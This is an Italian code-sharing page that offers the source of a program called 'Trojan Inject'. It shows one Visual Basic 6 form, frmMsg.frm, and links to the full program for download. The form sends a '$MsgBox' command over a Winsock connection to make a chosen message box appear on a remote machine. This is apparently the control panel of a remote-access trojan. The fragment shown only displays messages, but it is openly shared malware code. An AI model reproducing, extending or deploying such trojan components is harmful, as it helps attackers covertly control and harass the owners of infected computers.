Questo sito utilizza cookies solo per scopi di autenticazione sul sito e nient'altro. Nessuna informazione personale viene tracciata. Leggi l'informativa sui cookies.
Username: Password: oppure
Trojan Inject - frmMsg.frm

frmMsg.frm

Caricato da:
Scarica il programma completo

  1. Private Sub cmdanteprima_Click()
  2. Select Case optnorm.CausesValidation And optinf.CausesValidation And optescl.CausesValidation And opterr.CausesValidation
  3. Case optnorm.Value = True And optinf.Value = False And optescl.Value = False And opterr.Value = False
  4. MsgBox txtmsg.Text, , txttitle.Text
  5. Case optnorm.Value = False And optinf.Value = True And optescl.Value = False And opterr.Value = False
  6. MsgBox txtmsg.Text, vbInformation, txttitle.Text
  7. Case optnorm.Value = False And optinf.Value = False And optescl.Value = True And opterr.Value = False
  8. MsgBox txtmsg.Text, vbExclamation, txttitle.Text
  9. Case optnorm.Value = False And optinf.Value = False And optescl.Value = False And opterr.Value = True
  10. MsgBox txtmsg.Text, vbCritical, txttitle.Text
  11. End Select
  12. End Sub
  13.  
  14. Private Sub cmdsendmsg_Click()
  15. Select Case optnorm.CausesValidation And optinf.CausesValidation And optescl.CausesValidation And opterr.CausesValidation
  16. Case optnorm.Value = True And optinf.Value = False And optescl.Value = False And opterr.Value = False
  17. frmClient.WinClient.SendData "$MsgBox " & txtmsg.Text & "|" & txttitle.Text & "|" & "Normale"
  18. Case optnorm.Value = False And optinf.Value = True And optescl.Value = False And opterr.Value = False
  19. frmClient.WinClient.SendData "$MsgBox " & txtmsg.Text & "|" & txttitle.Text & "|" & "Informativo"
  20. Case optnorm.Value = False And optinf.Value = False And optescl.Value = True And opterr.Value = False
  21. frmClient.WinClient.SendData "$MsgBox " & txtmsg.Text & "|" & txttitle.Text & "|" & "Esclamativo"
  22. Case optnorm.Value = False And optinf.Value = False And optescl.Value = False And opterr.Value = True
  23. frmClient.WinClient.SendData "$MsgBox " & txtmsg.Text & "|" & txttitle.Text & "|" & "Errore"
  24. End Select
  25. Unload Me
  26. End Sub